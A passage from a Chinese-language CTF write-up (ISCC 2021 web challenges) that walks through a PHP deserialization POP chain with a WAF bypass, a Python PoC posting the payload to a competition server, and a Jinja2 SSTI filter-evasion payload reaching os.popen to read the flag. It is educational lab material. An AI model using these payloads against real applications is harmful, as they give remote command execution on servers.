<p>在ISCC__Upload类里面**，**有着这样的一批代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="variable">$is_upload</span>) &#123; <span class="keyword">foreach</span> (<span class="variable">$_FILES</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>)     <span class="variable">$GLOBALS</span>[<span class="variable">$key</span>] = <span class="variable">$value</span>;</span><br></pre></td></tr></table></figure>
<p>这个东西：<code>$GLOBALS['key'] = value;</code>　　<br>
指的的是PHP当前页面的全局变量$key = value的引用</p>
<p>当$is_upload为true的时候**，<strong>就会触发这个循环</strong>，<strong>可以实现$_SESSION的变量覆盖<br>
而在upload类里面的__wakeup方法里面<code>$is_upload = (count($_FILES) &gt; 0);</code>会把他设置成true</strong>，<strong>其他的类都设置成了false<br>
所以我们就要让upload执行__destruct的时候</strong>，<strong>is_upload是true<br>
这就要求</strong>，<strong>最早执行__destruct</strong>，**最晚执行__wakeup<br>
所以就可以按一定顺序来构造pop链</p>
<p>由于有一个waf函数**，<strong>不准出现</strong>*，<strong>而$new_cmd属性是protected的</strong>，<strong>序列化了就一定要带</strong>*，**绕过的方法就是16进制</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span>(<span class="params"><span class="variable">$s</span></span>) </span>&#123;    </span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$s</span>**,** <span class="string">&quot;*&quot;</span>) !== <span class="literal">FALSE</span>)        </span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;    <span class="keyword">return</span> <span class="literal">true</span>; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>那我们这样构造pop链：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Command</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_ResetCMD</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$new_cmd</span> = <span class="string">&quot;cat /flag&quot;</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;x=<span class="keyword">new</span> ISCC_Command();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Upload</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;y=<span class="keyword">new</span> ISCC_ResetCMD();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> ISCC_Upload();</span><br><span class="line"><span class="variable">$c</span>=urlencode(serialize(<span class="variable">$b</span>));</span><br><span class="line"><span class="variable">$c</span>=str_replace(<span class="string">&quot;s&quot;</span>,<span class="string">&quot;S&quot;</span>,<span class="variable">$c</span>);</span><br><span class="line"><span class="variable">$c</span>=str_replace(<span class="string">&quot;%2A&quot;</span>,<span class="string">&#x27;\2a&#x27;</span>,<span class="variable">$c</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$c</span>;</span><br></pre></td></tr></table></figure>
<p>payload：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A1%3A%22y%22%3BO%3A13%3A%22ISCC_ReSetCMD%22%3A2%3A%7BS%3A10%3A%22%00\2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A1%3A%22x%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D</span><br></pre></td></tr></table></figure>
<p>最终的poc：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url=<span class="string">&quot;http://39.96.91.106:7050/&quot;</span></span><br><span class="line"></span><br><span class="line">files=&#123;</span><br><span class="line">    <span class="string">&#x27;iscc_file&#x27;</span>:(<span class="string">&quot;b&quot;</span>,<span class="built_in">open</span>(<span class="string">&quot;1.png&quot;</span>,<span class="string">&quot;rb&quot;</span>)),</span><br><span class="line">    <span class="string">&quot;_SESSION&quot;</span>:(<span class="string">&quot;isccIsCciScc1scc&quot;</span>,<span class="string">&quot;123&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">r=requests.post(url=url+<span class="string">&quot;??=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A1%3A%22a%22%3BO%3A13%3A%22ISCC_ReSetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A1%3A%22b%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D&quot;</span>,files=files)</span><br><span class="line"><span class="built_in">print</span>(r.text) </span><br></pre></td></tr></table></figure>
<h2 id="lovely-ssti"><a class="header-anchor" href="#lovely-ssti">¶</a>lovely ssti</h2>
<p>参数是xiaodouni</p>
<p>payload如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> xiahua=(config|string)[<span class="number">14</span>]%&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> gb=(xiahua,xiahua,<span class="string">&quot;globals&quot;</span>,xiahua,xiahua)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> bl=(xiahua,xiahua,<span class="string">&quot;builtins&quot;</span>,xiahua,xiahua)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> cr=(lipsum|attr(gb)|attr(<span class="string">&quot;get&quot;</span>)(bl))[<span class="string">&quot;ch&quot;</span><span class="string">&quot;r&quot;</span>] %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> dian=cr(<span class="number">46</span>)%&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> xing =cr(<span class="number">42</span>)%&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> shell=(<span class="string">&quot;find / -name &quot;</span>,xing,<span class="string">&quot;fla&quot;</span>,xing)|join%&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> shell4 = <span class="string">&quot;cat /usr/fla??is?here?txt&quot;</span>%&#125;</span><br><span class="line">&#123;&#123;(lipsum|attr(gb)|attr(<span class="string">&quot;get&quot;</span>)(<span class="string">&quot;o&quot;</span><span class="string">&quot;s&quot;</span>)|attr(<span class="string">&quot;po&quot;</span><span class="string">&quot;pen&quot;</span>)(shell4))|attr(<span class="string">&quot;read&quot;</span>)()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>可参考这篇博客：<a target="_blank" rel="noopener" href="https://blog.csdn.net/jvkyvly/article/details/116953370">ISCC SSTI</a><br>
<img src="/" class="lazyload" data-src="https://img-blog.csdnimg.cn/20210525202556996.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3pzczE5Mg==,size_16,color_FFFFFF,t_70"  alt="在这里插入图片描述"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ISCC&#123;SsT1_is_eAsy_T0_lEarn(*~*)&#125;</span><br></pre></td></tr></table></figure>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">夏日</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://zss192.github.io/2021/05/25/ISCC%202021%20WP/">https://zss192.github.io/2021/05/25/ISCC%202021%20WP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://zss192.github.io" target="_blank">夏日 の blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF-WEB/">CTF-WEB</a></div><div class="post_share"><div class="social-share" data-image="/img/post/8.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"/><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付宝"/><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="next-post pull-full"><a href="/2021/04/13/2016%E5%B9%B4%E7%AC%AC%E4%B8%83%E5%B1%8A%E8%93%9D%E6%A1%A5%E6%9D%AFCB%E7%BB%84%E7%9C%81%E8%B5%9B%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90/"><img class="next_cover lazyload" data-src="/img/post/3.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">2016年第七届蓝桥杯C/C++B组省赛题目解析</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2020/05/07/CTF-XXE漏洞攻击/" title="CTF XXE漏洞攻击"><img class="relatedPosts_cover lazyload"data-src="/img/post/12.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-05-07</div><div class="relatedPosts_title">CTF XXE漏洞攻击</div></div></a></div><div class="relatedPosts_item"><a href="/2020/05/03/HCTF-2018-admin-wp/" title="[HCTF 2018]admin wp"><img class="relatedPosts_cover lazyload"data-src="/img/post/1.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-05-03</div><div class="relatedPosts_title">[HCTF 2018]admin wp</div></div></a></div><div class="relatedPosts_item"><a href="/2020/03/29/WUST-CTF2020-WP/" title=""><img class="relatedPosts_cover lazyload"data-src="/img/post/1.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-03-29</div><div class="relatedPosts_title"></div></div></a></div><div class="relatedPosts_item"><a href="/2020/03/26/反弹Shell/" title=""><img class="relatedPosts_cover lazyload"data-src="/img/post/10.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-03-26</div><div class="relatedPosts_title"></div></div></a></div><div class="relatedPosts_item"><a href="/2020/03/20/百度杯CTF比赛 九月场——123/" title=""><img class="relatedPosts_cover lazyload"data-src="/img/post/6.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-03-20</div><div class="relatedPosts_title"></div></div></a></div><div class="relatedPosts_item"><a href="/2020/03/20/Burp Suite Intruder4种攻击类型/" title=""><img class="relatedPosts_cover lazyload"data-src="/img/post/6.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-03-20</div><div class="relatedPosts_title"></div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://unpkg.com/valine@1.4.9/dist/Valine.min.js"></script><script>var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify: false,
  verify: false,
  appId: 'tekAEc3UtO7aXcLkamh2nCMM-gzGzoHsz',
  appKey: 'qVGeAkqGHCD2n17QxBQW2Q4P',
  placeholder: '建议评论时填写邮箱，可收到回复邮件提醒',
  avatar: 'monsterid',
  meta: guest_info,
  pageSize: '10',
  lang: 'zh-cn',
  recordIP: false,
  serverURLs: ''
});</script></div></article></main><footer id="footer" style="background-image: url(/img/post/8.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By 夏日</div><div class="framework-info"><span>驱动 </span><a target="_blank" rel="noopener" href="https://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="icp"><a target="_blank" rel="noopener" href="http://www.beian.gov.cn"><img class="icp-icon" src="/img/icp.png"/><span>豫ICP备20013184号</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="/js/third-party/activate-power-mode.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = false;
document.body.addEventListener('input', POWERMODE);
</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><script src="/js/third-party/ClickShowText.js"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":20},"mobile":{"show":false},"log":false,"tagMode":false});</script></body></html><script type="text/javascript" src="/js/crash_cheat.js"></script>